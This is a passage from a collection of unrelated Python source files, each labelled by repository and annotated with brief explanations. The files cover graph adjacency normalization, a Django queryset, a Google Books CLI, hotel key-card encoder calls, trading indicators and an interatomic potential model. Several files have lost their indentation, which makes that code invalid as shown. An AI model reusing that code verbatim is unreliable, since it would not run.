row, col = edge_index
deg = scatter_add(edge_weight, row, dim=0, dim_size=num_nodes)
deg_inv_sqrt = deg.pow(-0.5)
deg_inv_sqrt[deg_inv_sqrt == float('inf')] = 0
return edge_index, deg_inv_sqrt[row] * edge_weight * deg_inv_sqrt[col]
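get_in_directed_adj builds a second-order matrix L = P^T P from the row-normalized transition matrix P, linking nodes that share a common source. A toy pure-Python illustration (self-loops and the final normalization omitted for brevity):

```python
# Directed toy graph: node 0 points to nodes 1 and 2 (out-degree 2).
# P mirrors deg_inv[row] * edge_weight from the function above.
P = [[0.0, 0.5, 0.5],
     [0.0, 0.0, 0.0],
     [0.0, 0.0, 0.0]]
n = 3
# L = P^T P: entry (i, j) is positive when some node points to both i and j.
L = [[sum(P[k][i] * P[k][j] for k in range(n)) for j in range(n)] for i in range(n)]
# Nodes 1 and 2 share the common source 0, so L[1][2] > 0 even though
# there is no direct edge between them.
```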
def get_out_directed_adj(edge_index, num_nodes, dtype):
    """Second-order adjacency L = P P^T: two nodes are linked when they point
    to a common node. L is then symmetrically normalized."""
edge_weight = torch.ones((edge_index.size(1), ), dtype=dtype,
device=edge_index.device)
fill_value = 1
edge_index, edge_weight = add_self_loops(
edge_index, edge_weight, fill_value, num_nodes)
row, col = edge_index
deg = scatter_add(edge_weight, row, dim=0, dim_size=num_nodes)
deg_inv = deg.pow(-1)
deg_inv[deg_inv == float('inf')] = 0
p = deg_inv[row] * edge_weight
p_dense = torch.sparse.FloatTensor(edge_index, p, torch.Size([num_nodes,num_nodes])).to_dense()
L = torch.mm(p_dense, p_dense.t())
    # replace NaN entries with 0
    L[torch.isnan(L)] = 0
    # convert the dense matrix L back to sparse edge_index / edge_weight form
L_indices = torch.nonzero(L,as_tuple=False).t()
L_values = L[L_indices[0], L_indices[1]]
edge_index = L_indices
edge_weight = L_values
    # symmetric normalization of the second-order matrix L
row, col = edge_index
deg = scatter_add(edge_weight, row, dim=0, dim_size=num_nodes)
deg_inv_sqrt = deg.pow(-0.5)
deg_inv_sqrt[deg_inv_sqrt == float('inf')] = 0
    return edge_index, deg_inv_sqrt[row] * edge_weight * deg_inv_sqrt[col]

# File: pages/managers.py (repo: buketkonuk/pythondotorg, license: Apache-2.0)
from django.db.models.query import QuerySet
class PageQuerySet(QuerySet):
def published(self):
return self.filter(is_published=True)
def draft(self):
return self.filter(is_published=False)
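In Django this queryset is typically attached with `PageQuerySet.as_manager()` so that `Page.objects.published()` works. The chainable-filter pattern itself can be sketched without Django (`FakePageQuerySet` is a made-up stand-in, not the real class):

```python
class FakePageQuerySet(list):
    """Framework-free stand-in mimicking PageQuerySet's chainable filters."""
    def filter(self, **kwargs):
        return FakePageQuerySet(
            page for page in self
            if all(page.get(k) == v for k, v in kwargs.items())
        )
    def published(self):
        return self.filter(is_published=True)
    def draft(self):
        return self.filter(is_published=False)

pages = FakePageQuerySet([
    {"slug": "about", "is_published": True},
    {"slug": "wip", "is_published": False},
])
```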
# File: googlebooks.py (repo: toza-mimoza/Python-Google-Books-CLI, license: MIT)
import json
import click
import requests
import webbrowser
__author__ = "toza-mimoza"
@click.group()
def main():
"""
CLI for querying books on Google Books by toza-mimoza
"""
pass
@main.command()
@click.argument('query')
def search(query):
"""This search and return results corresponding to the given query from Google Books"""
url_format = 'https://www.googleapis.com/books/v1/volumes'
query = "+".join(query.split())
query_params = {
'q': query
}
response = requests.get(url_format, params=query_params)
responseInJSON=response.json()
with open('searchQuery.json','w') as json_file: #stores a query
json.dump(responseInJSON,json_file)
# click.echo(json.dumps(responseInJSON,indent=10))
for i in range(len(responseInJSON['items'])):
volInfo=responseInJSON['items'][i]['volumeInfo']
salInfo=responseInJSON['items'][i]['saleInfo']
accInfo=responseInJSON['items'][i]['accessInfo']
click.echo("__________________________________________________________________________________")
click.echo("Title:\t\t "+volInfo['title'])
if ('subtitle' in volInfo):
click.echo(" "+str(volInfo['subtitle']))
if('description' in volInfo):
click.echo("Description:\t "+volInfo['description'])
if ('authors' not in volInfo):
click.echo("Authors:\t UNKNOWN")
pass
elif len(volInfo['authors'])==1:
click.echo("Author:\t\t "+str(volInfo['authors'][0]))
elif len(volInfo['authors'])>1:
for author in volInfo['authors']:
click.echo("Author:\t\t "+author)
pass
pass
if ('publishedDate' not in volInfo):
click.echo("Published date:\t UNKNOWN")
else:
click.echo("Published date:\t "+volInfo['publishedDate'])
if ('pageCount' not in volInfo):
click.echo("Page count:\t UNKNOWN")
else:
click.echo("Page count:\t "+str(volInfo['pageCount']))
click.echo("Language:\t "+volInfo['language'])
click.echo("Sale Info: ")
click.echo(" Country:\t "+salInfo['country'])
if salInfo['saleability']=='FOR_SALE':
click.echo(" Price:\t "+str(salInfo['retailPrice']['amount'])+" "+salInfo['retailPrice']['currencyCode'])
if salInfo['retailPrice']['amount']==0.0:
click.echo(" Opening...")
url=accInfo['webReaderLink']
chrome_path="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
webbrowser.register('chrome', None, webbrowser.BackgroundBrowser(chrome_path))
webbrowser.get('chrome').open_new_tab(url)
elif salInfo['saleability']=='FREE':
click.echo(" Price:\t The book is FREE!")
click.echo(" Opening...")
if 'downloadLink' not in accInfo['pdf']:
click.echo("NO DOWNLOAD LINK...")
if 'webReaderLink' not in accInfo:
click.echo("NO WEB READER LINK")
pass
else:
url=accInfo['webReaderLink']
chrome_path="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
webbrowser.register('chrome', None,webbrowser.BackgroundBrowser(chrome_path))
webbrowser.get('chrome').open_new_tab(url)
pass
else:
url=accInfo['pdf']['downloadLink']
# file_name=volInfo['title'] #later for naming the downloaded file
chrome_path="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
webbrowser.register('chrome', None,webbrowser.BackgroundBrowser(chrome_path))
webbrowser.get('chrome').open_new_tab(url)
pass
elif salInfo['saleability']=='NOT_FOR_SALE':
click.echo(" Price:\t NOT FOR SALE")
pass
pass
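search() re-checks each optional volumeInfo field before printing. That guarding could be factored into a small helper like the following (`summarize_volume` is a hypothetical refactor, not part of the CLI):

```python
def summarize_volume(vol_info):
    """Collect the optional Google Books volumeInfo fields with UNKNOWN fallbacks."""
    return {
        "title": vol_info.get("title", "UNKNOWN"),
        "authors": vol_info.get("authors") or ["UNKNOWN"],
        "publishedDate": vol_info.get("publishedDate", "UNKNOWN"),
        "pageCount": vol_info.get("pageCount", "UNKNOWN"),
    }
```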
@main.command()
@click.argument('id')
def get(id):
"""This return a particular book from the given id on Google Books"""
url_format = 'https://www.googleapis.com/books/v1/volumes/{}'
click.echo(id)
response = requests.get(url_format.format(id))
    responseInJSON = response.json()
    # The volumes/{id} endpoint returns a single volume object (no 'items' list),
    # so wrap it to reuse the same iteration code as search().
    if 'items' not in responseInJSON:
        responseInJSON = {'items': [responseInJSON]}
with open('searchQuery.json','w') as json_file: #stores a query
json.dump(responseInJSON,json_file)
for i in range(len(responseInJSON['items'])):
volInfo=responseInJSON['items'][i]['volumeInfo']
salInfo=responseInJSON['items'][i]['saleInfo']
accInfo=responseInJSON['items'][i]['accessInfo']
click.echo("__________________________________________________________________________________")
click.echo("Title:\t\t "+volInfo['title'])
if ('subtitle' in volInfo):
click.echo(" "+str(volInfo['subtitle']))
if ('authors' not in volInfo):
click.echo("Authors:\t UNKNOWN")
pass
elif len(volInfo['authors'])==1:
click.echo("Author:\t\t "+str(volInfo['authors'][0]))
elif len(volInfo['authors'])>1:
for author in volInfo['authors']:
click.echo("Author:\t\t "+author)
pass
pass
if ('publishedDate' not in volInfo):
click.echo("Published date:\t UNKNOWN")
else:
click.echo("Published date:\t "+volInfo['publishedDate'])
if ('pageCount' not in volInfo):
click.echo("Page count:\t UNKNOWN")
else:
click.echo("Page count:\t "+str(volInfo['pageCount']))
click.echo("Language:\t "+volInfo['language'])
click.echo("Sale Info: ")
click.echo(" Country:\t "+salInfo['country'])
if salInfo['saleability']=='FOR_SALE':
click.echo(" Price:\t "+str(salInfo['retailPrice']['amount'])+" "+salInfo['retailPrice']['currencyCode'])
pass
elif salInfo['saleability']=='FREE':
click.echo(" Price:\t The book is FREE!")
######
click.echo(" Downloading...")
url=accInfo['pdf']['downloadLink']
file_name=volInfo['title']
r=requests.get(url)
with open(file_name+".pdf", "wb") as code:
code.write(r.content)
pass
click.echo("File downloaded! ")
######
pass
elif salInfo['saleability']=='NOT_FOR_SALE':
click.echo(" Price:\t NOT FOR SALE")
pass
pass
if __name__ == "__main__":
    main()

# File: inn/inn_hotels/doctype/inn_key_card/inn_key_card.py (repo: vinhnguyent090/front-desk, license: MIT)
# -*- coding: utf-8 -*-
# Copyright (c) 2020, Core Initiative and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
from datetime import datetime, timedelta
import frappe
import requests
import json
from frappe.model.document import Document
class InnKeyCard(Document):
pass
@frappe.whitelist()
def room_max_active_card():
return frappe.db.get_single_value('Inn Hotels Setting', 'room_max_active_card')
@frappe.whitelist()
def issue_card(reservation_id):
door_lock_provider = frappe.db.get_single_value('Inn Hotels Setting', 'door_lock_api_provider')
if door_lock_provider == 'TESA':
doc = frappe.get_doc('Inn Reservation', reservation_id)
room = doc.actual_room_id
expiryDate = datetime.strftime(doc.departure, "%d/%m/%Y")
cards = doc.issued_card
active_card = 0
for card in cards:
active_card += int(card.is_active)
if active_card == 0:
cmd = "CI"
else:
cmd = "CG"
new_card = frappe.new_doc('Inn Key Card')
new_card.card_number = tesa_checkin(cmd, room, expiryDate)
if new_card.card_number == "E2" or new_card.card_number == "ED":
return 'ERROR'
else:
new_card.room_id = doc.actual_room_id
new_card.issue_date = datetime.today()
new_card.expired_date = doc.departure
new_card.parent = doc.name
new_card.parentfield = 'issued_card'
new_card.parenttype = 'Inn Reservation'
new_card.insert()
return new_card.card_number
elif door_lock_provider == 'DOWS':
doc = frappe.get_doc('Inn Reservation', reservation_id)
room = doc.actual_room_id
expiryDate = datetime.strftime(doc.departure, "%Y-%m-%d")
new_card = frappe.new_doc('Inn Key Card')
new_card.card_number = dows_checkin("01", room, expiryDate)
if new_card.card_number is None:
return 'ERROR'
else:
new_card.room_id = doc.actual_room_id
new_card.issue_date = datetime.today()
new_card.expired_date = doc.departure
new_card.parent = doc.name
new_card.parentfield = 'issued_card'
new_card.parenttype = 'Inn Reservation'
new_card.insert()
return new_card.card_number
@frappe.whitelist()
def erase_card(flag, card_name):
door_lock_provider = frappe.db.get_single_value('Inn Hotels Setting', 'door_lock_api_provider')
if door_lock_provider == 'TESA':
doc = frappe.get_doc('Inn Key Card', card_name)
if flag == 'with':
card_number_returned = tesa_erase()
if card_number_returned == doc.card_number:
doc.expired_date = datetime.today() - timedelta(1)
doc.is_active = 0
doc.save()
return doc.is_active
elif card_number_returned == "E2" or card_number_returned == "ED":
return 'ERROR'
elif flag == 'without':
doc.expired_date = datetime.today() - timedelta(1)
doc.is_active = 0
doc.save()
return doc.is_active
elif door_lock_provider == 'DOWS':
doc = frappe.get_doc('Inn Key Card', card_name)
room = doc.room_id
if flag == 'with':
message_erase = dows_erase(room)
if message_erase is not None:
doc.is_active = 0
doc.save()
return doc.is_active
elif flag == 'without':
doc.expired_date = datetime.today() - timedelta(1)
doc.is_active = 0
doc.save()
return doc.is_active
def tesa_erase():
# api-endpoint
api_checkin_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/checkin'
# defining a params dict for the parameters to be sent to the API
params = {
"cmd": "CI",
"room": "999",
"activationDate": datetime.today().strftime("%d/%m/%Y"),
"activationTime": "12:00",
"expiryDate": (datetime.today() - timedelta(1)).strftime("%d/%m/%Y"),
"expiryTime": "12:00",
"returnCardId": "1"
}
if api_checkin_url is not None:
if int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth')) == 1:
auth = (frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user'),
frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password'))
r = requests.post(api_checkin_url, json=params, auth=auth)
else:
r = requests.post(api_checkin_url, json=params)
if r:
returned = json.loads(r.text)
msg_hex = returned['rawMsgHex']
data = msg_hex.split("B3")
card_number = bytearray.fromhex(data[-2]).decode()
r.close()
return card_number
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")
def tesa_checkin(cmd, room_id, expiry_date):
# api-endpoint
api_checkin_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/checkin'
# defining a params dict for the parameters to be sent to the API
params = {
"cmd": cmd,
"room": room_id.replace('R-', ''),
"activationDate": datetime.today().strftime("%d/%m/%Y"),
"activationTime": "12:00",
"expiryDate": expiry_date,
"expiryTime": "14:00",
"returnCardId": "1"
}
if api_checkin_url is not None:
if int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth')) == 1:
auth = (frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user'),
frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password'))
r = requests.post(api_checkin_url, json=params, auth=auth)
else:
r = requests.post(api_checkin_url, json=params)
if r:
returned = json.loads(r.text)
msg_hex = returned['rawMsgHex']
data = msg_hex.split("B3")
card_number = bytearray.fromhex(data[-2]).decode()
r.close()
return card_number
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")
def tesa_verify(track):
# api-endpoint
api_verify_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/verify'
# defining a params dict for the parameters to be sent to the API
params = {
"cmd": "RC",
"technology": "P",
"cardOperation": "RP",
"encoder": "1",
"format": "T",
"track": track
}
if api_verify_url is not None:
if int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth')) == 1:
auth = (frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user'),
frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password'))
r = requests.post(api_verify_url, json=params, auth=auth)
else:
r = requests.post(api_verify_url, json=params)
if r:
returned = json.loads(r.text)
r.close()
return returned
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")

def dows_checkin(building, room_id, expiry_date):
    api_checkin_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/checkin'
    params = {
        "building": building,
        "room": room_id.replace('R-', '').zfill(4),
        "door": "00",
        "arrival": datetime.today().strftime("%Y-%m-%d") + " 12:00:00",
        "departure": expiry_date + " 14:00:00",
    }
    if api_checkin_url is not None:
        s = requests.Session()
        headers = {"Content-Type": "application/json"}
        req = requests.Request('POST', api_checkin_url, json=params, headers=headers)
        prepped = s.prepare_request(req)
        del prepped.headers['Connection']
        del prepped.headers['Accept-Encoding']
        del prepped.headers['Accept']
        r = s.send(prepped)
        if r:
            returned = json.loads(r.text)
            r.close()
            return returned['cardNo']
        else:
            frappe.msgprint("Error. Fail to Connect to CardEncoder. Please wait a moment and try again.")

def dows_verify():
    api_checkin_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/verify'
    if api_checkin_url is not None:
        s = requests.Session()
        req = requests.Request('GET', api_checkin_url)
        prepped = s.prepare_request(req)
        del prepped.headers['Connection']
        del prepped.headers['Accept-Encoding']
        del prepped.headers['Accept']
        r = s.send(prepped)
        if r:
            returned = json.loads(r.text)
            r.close()
            return returned

def dows_erase(room_id):
    api_checkin_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/erase/' + room_id.replace('R-', '').zfill(4)
    if api_checkin_url is not None:
        s = requests.Session()
        req = requests.Request('DELETE', api_checkin_url)
        prepped = s.prepare_request(req)
        del prepped.headers['Connection']
        del prepped.headers['Accept-Encoding']
        del prepped.headers['Accept']
        r = s.send(prepped)
        if r:
            returned = json.loads(r.text)
            r.close()
            return returned['cardNo']

@frappe.whitelist()
def test_api(option):
    if option == "1":
        frappe.msgprint("tesa_read_card1")
        returned = tesa_read_card1("3")
        frappe.msgprint("User = " + returned['user'])
        frappe.msgprint("Expiry Date = " + returned['expiryDate'])
        frappe.msgprint("Info = " + returned['info'])
    elif option == "2":
        frappe.msgprint("tesa_read_card2")
        returned = tesa_read_card2("3")
        frappe.msgprint("User = " + returned['user'])
        frappe.msgprint("Expiry Date = " + returned['expiryDate'])
        frappe.msgprint("Info = " + returned['info'])
    elif option == "3":
        frappe.msgprint("tesa_read_card3")
        returned = tesa_read_card3("3")
        frappe.msgprint("User = " + returned['user'])
        frappe.msgprint("Expiry Date = " + returned['expiryDate'])
        frappe.msgprint("Info = " + returned['info'])
    elif option == "4":
        frappe.msgprint("tesa_read_card4")
        returned = tesa_read_card4("3")
        frappe.msgprint("User = " + returned['user'])
        frappe.msgprint("Expiry Date = " + returned['expiryDate'])
        frappe.msgprint("Info = " + returned['info'])

@frappe.whitelist()
def verify_card(track):
    door_lock_provider = frappe.db.get_single_value('Inn Hotels Setting', 'door_lock_api_provider')
    if door_lock_provider == 'TESA':
        returned = tesa_verify(track)
        frappe.msgprint("User = " + returned['user'])
        frappe.msgprint("Expiry Date = " + returned['expiryDate'])
        frappe.msgprint("Expiry Time = " + returned['expiryTime'])
    elif door_lock_provider == 'DOWS':
        returned = dows_verify()
        frappe.msgprint("Room = R-" + returned['room'].lstrip("0"))
        frappe.msgprint("Expiry Date = " + returned['departure'])
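The room-id conversion used throughout this module (`room_id.replace('R-', '').zfill(4)` on the way to the encoder, `"R-" + room.lstrip("0")` on the way back, as in `verify_card` above) can be sketched as a pair of hypothetical helpers — the names are illustrative, not part of the module:

```python
def to_lock_room(room_id):
    # "R-102" -> "0102": strip the prefix and left-pad to four digits,
    # the format the card encoder expects.
    return room_id.replace('R-', '').zfill(4)

def from_lock_room(room):
    # "0102" -> "R-102": the inverse used when displaying a verified card.
    # Note lstrip("0") drops *all* leading zeros, so "0010" becomes "10".
    return "R-" + room.lstrip("0")

print(to_lock_room("R-102"))   # -> 0102
print(from_lock_room("0102"))  # -> R-102
```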

def tesa_check_in(cmd, room, activationDate, activationTime, expiryDate, expiryTime,
                  pcId="", technology="P", encoder="1", cardOperation="EF", grant=None, keypad=None, operator=None,
                  track1=None, track2=None, room2=None, room3=None, room4=None, returnCardId=None, cardId=None):
    # Example Post
    # {"pcId": "1", "cmd": "PI", "room": "102", "activationDate": "16/05/2017",
    #  "activationTime": "12:00", "expiryDate": "17/05/2017", "expiryTime": "12:00",
    #  "cardOperation": "RP", "operator": "tesa"}
    # api-endpoint
    url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
    username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
    password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
    is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
    # defining header JSON
    headers = {'Content-Type': 'application/json', 'Accept': 'text/plain'}
    # defining auth to be sent to the API
    if is_card_use_auth == 1:
        auth = (username, password)
    # defining a params dict for the parameters to be sent to the API
    params = {
        'pcId': pcId,
        'cmd': cmd,
        'technology': technology,
        'cardOperation': cardOperation,
        'encoder': encoder,
        'room': room,
        'activationDate': activationDate,
        'activationTime': activationTime,
        'expiryDate': expiryDate,
        'expiryTime': expiryTime,
    }
    # Optional params assignment if provided
    if grant is not None:
        params.update({'grant': grant})
    if keypad is not None:
        params.update({'keypad': keypad})
    if operator is not None:
        params.update({'operator': operator})
    if track1 is not None:
        params.update({'track1': track1})
    if track2 is not None:
        params.update({'track2': track2})
    if room2 is not None:
        params.update({'room2': room2})
    if room3 is not None:
        params.update({'room3': room3})
    if room4 is not None:
        params.update({'room4': room4})
    if returnCardId is not None:
        params.update({'returnCardId': returnCardId})
    if cardId is not None:
        params.update({'cardId': cardId})
    if url is not None:
        # Note: data=params sends the payload form-encoded even though the
        # Content-Type header claims JSON; requests.post(url, json=params)
        # would send an actual JSON body if the encoder expects one.
        if is_card_use_auth == 1:
            r = requests.post(url, data=params, headers=headers, auth=auth)
        else:
            r = requests.post(url, data=params, headers=headers)
        if r:
            returned = json.loads(r.text)
            return returned['returnCardId']
        else:
            return "CARD NUMBER FROM TESA CHECK IN"
    else:
        frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")

def tesa_read_card(track, pcId="", cmd="RC", technology="P", cardOperation="EF", encoder="1", format="T", message=""):
    # Example Post
    # {"pcId": "", "cmd": "RC", "technology": "P", "cardOperation": "EF", "encoder":
    #  "1", "format": "T", "track": "3", "message": ""}
    # api-endpoint
    url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
    username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
    password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
    is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
    # defining header JSON
    headers = {'Content-Type': 'application/json', 'Accept': 'text/plain'}
    # defining auth to be sent to the API
    if is_card_use_auth == 1:
        auth = (username, password)
    # defining a params dict for the parameters to be sent to the API
    params = {
        'pcId': pcId,
        'cmd': cmd,
        'technology': technology,
        'cardOperation': cardOperation,
        'encoder': encoder,
        'format': format,
        'track': track,
        'message': message,
    }
    if url is not None:
        if is_card_use_auth == 1:
            r = requests.post(url, data=params, headers=headers, auth=auth)
        else:
            r = requests.post(url, data=params, headers=headers)
        if r:
            returned = json.loads(r.text)
            return returned
    else:
        frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")

def tesa_read_card1(track, pcId="", cmd="RC", technology="P", cardOperation="EF", encoder="1", format="T", message=""):
    # Debugging variant 1: posts with json=params (JSON body, Content-Type set
    # automatically by requests; the headers dict below is unused here).
    # Example Post
    # {"pcId": "", "cmd": "RC", "technology": "P", "cardOperation": "EF", "encoder":
    #  "1", "format": "T", "track": "3", "message": ""}
    # api-endpoint
    url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
    username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
    password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
    is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
    # defining header JSON
    headers = {'Content-Type': 'application/json', 'Accept': 'text/plain'}
    # defining auth to be sent to the API
    if is_card_use_auth == 1:
        auth = (username, password)
    # defining a params dict for the parameters to be sent to the API
    params = {
        'pcId': pcId,
        'cmd': cmd,
        'technology': technology,
        'cardOperation': cardOperation,
        'encoder': encoder,
        'format': format,
        'track': track,
        'message': message,
    }
    if url is not None:
        if is_card_use_auth == 1:
            r = requests.post(url, json=params, auth=auth)
        else:
            r = requests.post(url, json=params)
        if r:
            print("headers: ")
            print(r.headers)
            returned = json.loads(r.text)
            return returned
    else:
        frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")

def tesa_read_card2(track, pcId="", cmd="RC", technology="P", cardOperation="EF", encoder="1", format="T", message=""):
    # Debugging variant 2: posts with data=json.dumps(params) (raw JSON body,
    # no explicit Content-Type header sent).
    # Example Post
    # {"pcId": "", "cmd": "RC", "technology": "P", "cardOperation": "EF", "encoder":
    #  "1", "format": "T", "track": "3", "message": ""}
    # api-endpoint
    url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
    username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
    password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
    is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
    # defining header JSON
    headers = {'Content-Type': 'application/json', 'Accept': 'text/plain'}
    # defining auth to be sent to the API
    if is_card_use_auth == 1:
        auth = (username, password)
    # defining a params dict for the parameters to be sent to the API
    params = {
        'pcId': pcId,
        'cmd': cmd,
        'technology': technology,
        'cardOperation': cardOperation,
        'encoder': encoder,
        'format': format,
        'track': track,
        'message': message,
    }
    if url is not None:
        if is_card_use_auth == 1:
            r = requests.post(url, data=json.dumps(params), auth=auth)
        else:
            r = requests.post(url, data=json.dumps(params))
        if r:
            print("headers: ")
            print(r.headers)
            returned = json.loads(r.text)
            return returned
    else:
        frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")

def tesa_read_card3(track, pcId="", cmd="RC", technology="P", cardOperation="EF", encoder="1", format="T", message=""):
    # Debugging variant 3: posts with data=params and explicit headers
    # (form-encoded body despite the JSON Content-Type header).
    # Example Post
    # {"pcId": "", "cmd": "RC", "technology": "P", "cardOperation": "EF", "encoder":
    #  "1", "format": "T", "track": "3", "message": ""}
    # api-endpoint
    url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
    username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
    password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
    is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
    # defining header JSON
    headers = {'Content-Type': 'application/json', 'Accept': 'text/plain'}
    # defining auth to be sent to the API
    if is_card_use_auth == 1:
        auth = (username, password)
    # defining a params dict for the parameters to be sent to the API
    params = {
        'pcId': pcId,
        'cmd': cmd,
        'technology': technology,
        'cardOperation': cardOperation,
        'encoder': encoder,
        'format': format,
        'track': track,
        'message': message,
    }
    if url is not None:
        if is_card_use_auth == 1:
            r = requests.post(url, data=params, headers=headers, auth=auth)
        else:
            r = requests.post(url, data=params, headers=headers)
        if r:
            print("headers: ")
            print(r.headers)
            returned = json.loads(r.text)
            return returned
    else:
        frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")

def tesa_read_card4(track, pcId="", cmd="RC", technology="P", cardOperation="EF", encoder="1", format="T", message=""):
    # Debugging variant 4: like variant 3 but without the Accept header.
    # Example Post
    # {"pcId": "", "cmd": "RC", "technology": "P", "cardOperation": "EF", "encoder":
    #  "1", "format": "T", "track": "3", "message": ""}
    # api-endpoint
    url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
    username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
    password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
    is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
    # defining header JSON
    headers = {'Content-Type': 'application/json'}
    # defining auth to be sent to the API
    if is_card_use_auth == 1:
        auth = (username, password)
    # defining a params dict for the parameters to be sent to the API
    params = {
        'pcId': pcId,
        'cmd': cmd,
        'technology': technology,
        'cardOperation': cardOperation,
        'encoder': encoder,
        'format': format,
        'track': track,
        'message': message,
    }
    if url is not None:
        if is_card_use_auth == 1:
            r = requests.post(url, data=params, headers=headers, auth=auth)
        else:
            r = requests.post(url, data=params, headers=headers)
        if r:
            print("headers: ")
            print(r.headers)
            returned = json.loads(r.text)
            return returned
    else:
        frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")
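The four `tesa_read_card*` variants above differ only in how the request body is serialized. The difference is visible without any server, using only the standard library to mimic what `requests` puts on the wire (`data=dict` form-encodes; `json=dict` or `data=json.dumps(dict)` sends JSON):

```python
import json
from urllib.parse import urlencode

params = {"cmd": "RC", "track": "3"}

# requests.post(url, data=params) sends a form-encoded body:
form_body = urlencode(params)
# requests.post(url, json=params) (or data=json.dumps(params)) sends JSON:
json_body = json.dumps(params)

print(form_body)  # cmd=RC&track=3
print(json_body)  # {"cmd": "RC", "track": "3"}
```

This is why variant 3's explicit `Content-Type: application/json` header is misleading: the body it actually sends is the form-encoded one.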

# --- Server/Controller/IndicatorController.py (repo: admantiumblack/invest-trigger-fastapi, license: MIT) ---
import pandas_ta as pdt

def moving_average(prices, period, limit):
    res = pdt.sma(prices['prices'], period)
    return res.iloc[-limit:].to_numpy()

def exponential_moving_average(prices, period, limit):
    # Note: unlike moving_average, this passes the whole object rather than
    # prices['prices']; pdt.ema likely expects the price series itself.
    res = pdt.ema(prices, period)
    return res.iloc[-limit:].to_numpy()
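The slicing semantics of these helpers (compute the indicator over the whole series, then keep only the last `limit` values) can be sketched without `pandas_ta`, using a plain rolling mean. This is a hypothetical stand-in to illustrate the behavior, not the library call itself:

```python
def simple_moving_average(prices, period, limit):
    # Rolling mean over `period` points; entries before a full window are None,
    # mirroring the NaN padding that pandas_ta.sma produces.
    res = [None] * (period - 1)
    for i in range(period - 1, len(prices)):
        window = prices[i - period + 1:i + 1]
        res.append(sum(window) / period)
    return res[-limit:]  # keep only the most recent `limit` values

print(simple_moving_average([1, 2, 3, 4, 5, 6], 3, 2))  # -> [4.0, 5.0]
```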

# --- mff/models/eam.py (repo: alvarovm/mff, license: Apache-2.0) ---
# -*- coding: utf-8 -*-
import json
import warnings
from itertools import combinations_with_replacement
from pathlib import Path
import numpy as np
from mff import gp, interpolation, kernels, utility
from mff.models.base import Model

class NpEncoder(json.JSONEncoder):
    def default(self, obj):
        if isinstance(obj, np.integer):
            return int(obj)
        elif isinstance(obj, np.floating):
            return float(obj)
        elif isinstance(obj, np.ndarray):
            return obj.tolist()
        else:
            return super(NpEncoder, self).default(obj)
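`NpEncoder` exists because `json.dumps` raises `TypeError` on NumPy scalars and arrays; `default()` is the standard `JSONEncoder` hook called only for objects json cannot serialize natively. The same pattern with a stdlib type, for illustration:

```python
import json
from decimal import Decimal

class DecimalEncoder(json.JSONEncoder):
    def default(self, obj):
        # Invoked only for objects json can't serialize on its own.
        if isinstance(obj, Decimal):
            return float(obj)
        return super().default(obj)

print(json.dumps({"sigma": Decimal("0.5")}, cls=DecimalEncoder))  # {"sigma": 0.5}
```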

def get_max_eam(X, rc, r0):
    t_max = 0
    for c in X:
        dist = np.sum(c[:, :3]**2, axis=1)**0.5
        cut_1 = 0.5*(1 + np.cos(np.pi*dist/rc))
        t1 = np.exp(-(dist/r0 - 1))
        t2 = -sum(cut_1*t1)**0.5
        if t2 < t_max:
            t_max = t2
    return t_max

def get_max_eam_energy(X_glob, rc, r0):
    t_max = 0
    for X in X_glob:
        t2 = get_max_eam(X, rc, r0)
        if t2 < t_max:
            t_max = t2
    return t_max
